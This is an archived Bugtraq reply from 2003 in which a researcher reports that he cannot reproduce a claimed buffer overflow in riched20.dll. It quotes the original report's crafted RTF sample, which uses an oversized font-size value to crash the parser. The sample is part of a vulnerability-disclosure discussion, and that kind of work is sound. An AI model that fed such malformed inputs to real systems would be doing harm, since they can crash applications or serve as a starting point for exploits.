[28920] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: Riched20.DLL attribute label buffer overflow vulnerability

daemon@ATHENA.MIT.EDU (3APA3A)
Tue Feb 18 11:17:10 2003

Date: Tue, 18 Feb 2003 11:36:59 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Message-ID: <7353719955.20030218113659@SECURITY.NNOV.RU>
To: bugtraq <bugtraq@securityfocus.com>
Resent-From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Jie Dong,

Can't reproduce it on riched20.dll v.3.0 (5.30.23.1200) under NT.

--Sunday, February 16, 2003, 4:30:50 PM, you wrote to bugtraq@securityfocus.com:


JD>    The   following   RTFfile  may  result  in  illegal  operation  :
JD> {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
JD> \fnil\fprq2\fcharset134        \'cb\'ce\'cc\'e5;}}        {\colortbl
JD> ;\red255\green0\blue255;}        \viewkind4\uc1\pard\cf1\kerning2\f0
JD> \fs18121111111111111111111111111111111110000
JD> www.yoursft.com\fs20\par  }  "\fs"  was used for setting the size of


-- 
~/ZARAZA
Человек это тайна... я занимаюсь этой тайной чтобы быть человеком. (Достоевский)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[28920] in bugtraq

Re: Riched20.DLL attribute label buffer overflow vulnerability

daemon@ATHENA.MIT.EDU (3APA3A)Tue Feb 18 11:17:10 2003

daemon@ATHENA.MIT.EDU (3APA3A)
Tue Feb 18 11:17:10 2003